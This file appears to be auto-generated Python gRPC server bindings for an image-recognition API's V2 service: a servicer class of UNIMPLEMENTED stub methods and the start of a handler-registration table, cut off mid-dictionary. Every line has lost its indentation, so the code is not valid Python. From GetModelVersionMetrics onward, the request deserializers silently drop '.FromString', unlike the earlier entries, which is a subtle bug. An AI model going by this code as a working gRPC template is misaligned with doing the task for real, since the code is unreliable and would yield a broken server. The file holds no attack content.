class V2Servicer(object):
# missing associated documentation comment in .proto file
pass
def GetConceptCounts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetConcept(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostConceptsSearches(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetVocab(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocab(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocabs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListVocabConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostVocabConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocabConcept(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteVocabConcepts(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetConceptLanguage(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConceptLanguages(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostConceptLanguages(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchConceptLanguages(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConceptReferences(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListConceptRelations(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetInputCount(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def StreamInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetInput(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteInput(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelOutputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelFeedback(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModel(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelOutputInfo(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelsSearches(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModel(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModels(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModelInputs(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelVersion(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListModelVersions(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelVersions(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteModelVersion(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetModelVersionMetrics(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostModelVersionMetrics(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetWorkflow(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListPublicWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PatchWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteWorkflow(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def DeleteWorkflows(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostWorkflowResults(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostSearches(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostSearchFeedback(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetSubscription(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostSubscription(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetAppVisualization(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetVisualization(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def PostVisualization(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListStatusCodes(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def GetStatusCode(self, request, context):
# missing associated documentation comment in .proto file
pass
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
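# Usage sketch (illustrative, not part of the generated bindings): a concrete
# service subclasses V2Servicer and overrides only the RPCs it supports; the
# rest keep the UNIMPLEMENTED default above. The instance is then registered
# with a grpc server via add_V2Servicer_to_server below. Executor size and
# port are arbitrary example values.
#
#   from concurrent import futures
#
#   class ConceptOnlyServicer(V2Servicer):
#     def ListConcepts(self, request, context):
#       return proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse()
#
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
#   add_V2Servicer_to_server(ConceptOnlyServicer(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()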
def add_V2Servicer_to_server(servicer, server):
rpc_method_handlers = {
'GetConceptCounts': grpc.unary_unary_rpc_method_handler(
servicer.GetConceptCounts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptCountsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptCountResponse.SerializeToString,
),
'GetConcept': grpc.unary_unary_rpc_method_handler(
servicer.GetConcept,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.GetConceptRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.SingleConceptResponse.SerializeToString,
),
'ListConcepts': grpc.unary_unary_rpc_method_handler(
servicer.ListConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.ListConceptsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PostConceptsSearches': grpc.unary_unary_rpc_method_handler(
servicer.PostConceptsSearches,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsSearchesRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PostConcepts': grpc.unary_unary_rpc_method_handler(
servicer.PostConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PostConceptsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PatchConcepts': grpc.unary_unary_rpc_method_handler(
servicer.PatchConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__pb2.PatchConceptsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'GetVocab': grpc.unary_unary_rpc_method_handler(
servicer.GetVocab,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.GetVocabRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.SingleVocabResponse.SerializeToString,
),
'ListVocabs': grpc.unary_unary_rpc_method_handler(
servicer.ListVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.SerializeToString,
),
'PostVocabs': grpc.unary_unary_rpc_method_handler(
servicer.PostVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.SerializeToString,
),
'PatchVocabs': grpc.unary_unary_rpc_method_handler(
servicer.PatchVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PatchVocabsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.MultiVocabResponse.SerializeToString,
),
'DeleteVocab': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocab,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteVocabs': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocabs,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'ListVocabConcepts': grpc.unary_unary_rpc_method_handler(
servicer.ListVocabConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.ListVocabConceptsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'PostVocabConcepts': grpc.unary_unary_rpc_method_handler(
servicer.PostVocabConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.PostVocabConceptsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'DeleteVocabConcept': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocabConcept,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteVocabConcepts': grpc.unary_unary_rpc_method_handler(
servicer.DeleteVocabConcepts,
request_deserializer=proto_dot_clarifai_dot_api_dot_vocab__pb2.DeleteVocabConceptsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetConceptLanguage': grpc.unary_unary_rpc_method_handler(
servicer.GetConceptLanguage,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.GetConceptLanguageRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.SingleConceptLanguageResponse.SerializeToString,
),
'ListConceptLanguages': grpc.unary_unary_rpc_method_handler(
servicer.ListConceptLanguages,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.ListConceptLanguagesRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.SerializeToString,
),
'PostConceptLanguages': grpc.unary_unary_rpc_method_handler(
servicer.PostConceptLanguages,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PostConceptLanguagesRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.SerializeToString,
),
'PatchConceptLanguages': grpc.unary_unary_rpc_method_handler(
servicer.PatchConceptLanguages,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.PatchConceptLanguagesRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__language__pb2.MultiConceptLanguageResponse.SerializeToString,
),
'ListConceptReferences': grpc.unary_unary_rpc_method_handler(
servicer.ListConceptReferences,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.ListConceptReferencesRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__reference__pb2.MultiConceptReferenceResponse.SerializeToString,
),
'ListConceptRelations': grpc.unary_unary_rpc_method_handler(
servicer.ListConceptRelations,
request_deserializer=proto_dot_clarifai_dot_api_dot_concept__graph__pb2.ListConceptRelationsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_concept__pb2.MultiConceptResponse.SerializeToString,
),
'GetInputCount': grpc.unary_unary_rpc_method_handler(
servicer.GetInputCount,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputCountRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputCountResponse.SerializeToString,
),
'StreamInputs': grpc.unary_unary_rpc_method_handler(
servicer.StreamInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.StreamInputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'GetInput': grpc.unary_unary_rpc_method_handler(
servicer.GetInput,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.GetInputRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.SingleInputResponse.SerializeToString,
),
'ListInputs': grpc.unary_unary_rpc_method_handler(
servicer.ListInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListInputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'PostInputs': grpc.unary_unary_rpc_method_handler(
servicer.PostInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostInputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'PatchInputs': grpc.unary_unary_rpc_method_handler(
servicer.PatchInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PatchInputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'DeleteInput': grpc.unary_unary_rpc_method_handler(
servicer.DeleteInput,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteInputs': grpc.unary_unary_rpc_method_handler(
servicer.DeleteInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.DeleteInputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'PostModelOutputs': grpc.unary_unary_rpc_method_handler(
servicer.PostModelOutputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelOutputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_output__pb2.MultiOutputResponse.SerializeToString,
),
'PostModelFeedback': grpc.unary_unary_rpc_method_handler(
servicer.PostModelFeedback,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.PostModelFeedbackRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetModel': grpc.unary_unary_rpc_method_handler(
servicer.GetModel,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'GetModelOutputInfo': grpc.unary_unary_rpc_method_handler(
servicer.GetModelOutputInfo,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.GetModelRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'ListModels': grpc.unary_unary_rpc_method_handler(
servicer.ListModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.ListModelsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.SerializeToString,
),
'PostModelsSearches': grpc.unary_unary_rpc_method_handler(
servicer.PostModelsSearches,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsSearchesRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.SerializeToString,
),
'PostModels': grpc.unary_unary_rpc_method_handler(
servicer.PostModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.PostModelsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'PatchModels': grpc.unary_unary_rpc_method_handler(
servicer.PatchModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.PatchModelsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.MultiModelResponse.SerializeToString,
),
'DeleteModel': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModel,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteModels': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModels,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__pb2.DeleteModelsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'ListModelInputs': grpc.unary_unary_rpc_method_handler(
servicer.ListModelInputs,
request_deserializer=proto_dot_clarifai_dot_api_dot_input__pb2.ListModelInputsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_input__pb2.MultiInputResponse.SerializeToString,
),
'GetModelVersion': grpc.unary_unary_rpc_method_handler(
servicer.GetModelVersion,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.SerializeToString,
),
'ListModelVersions': grpc.unary_unary_rpc_method_handler(
servicer.ListModelVersions,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.ListModelVersionsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.MultiModelVersionResponse.SerializeToString,
),
'PostModelVersions': grpc.unary_unary_rpc_method_handler(
servicer.PostModelVersions,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionsRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_model__pb2.SingleModelResponse.SerializeToString,
),
'DeleteModelVersion': grpc.unary_unary_rpc_method_handler(
servicer.DeleteModelVersion,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.DeleteModelVersionRequest.FromString,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetModelVersionMetrics': grpc.unary_unary_rpc_method_handler(
servicer.GetModelVersionMetrics,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.GetModelVersionMetricsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.SerializeToString,
),
'PostModelVersionMetrics': grpc.unary_unary_rpc_method_handler(
servicer.PostModelVersionMetrics,
request_deserializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.PostModelVersionMetricsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_model__version__pb2.SingleModelVersionResponse.SerializeToString,
),
'GetWorkflow': grpc.unary_unary_rpc_method_handler(
servicer.GetWorkflow,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.GetWorkflowRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.SingleWorkflowResponse.SerializeToString,
),
'ListWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.ListWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'ListPublicWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.ListPublicWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.ListPublicWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'PostWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.PostWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'PatchWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.PatchWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PatchWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.MultiWorkflowResponse.SerializeToString,
),
'DeleteWorkflow': grpc.unary_unary_rpc_method_handler(
servicer.DeleteWorkflow,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'DeleteWorkflows': grpc.unary_unary_rpc_method_handler(
servicer.DeleteWorkflows,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.DeleteWorkflowsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'PostWorkflowResults': grpc.unary_unary_rpc_method_handler(
servicer.PostWorkflowResults,
request_deserializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_workflow__pb2.PostWorkflowResultsResponse.SerializeToString,
),
'PostSearches': grpc.unary_unary_rpc_method_handler(
servicer.PostSearches,
request_deserializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchesRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_search__pb2.MultiSearchResponse.SerializeToString,
),
'PostSearchFeedback': grpc.unary_unary_rpc_method_handler(
servicer.PostSearchFeedback,
request_deserializer=proto_dot_clarifai_dot_api_dot_search__pb2.PostSearchFeedbackRequest,
response_serializer=proto_dot_clarifai_dot_api_dot_status_dot_status__pb2.BaseResponse.SerializeToString,
),
'GetSubscription': grpc.unary_unary_rpc_method_handler(
servicer.GetSubscription,
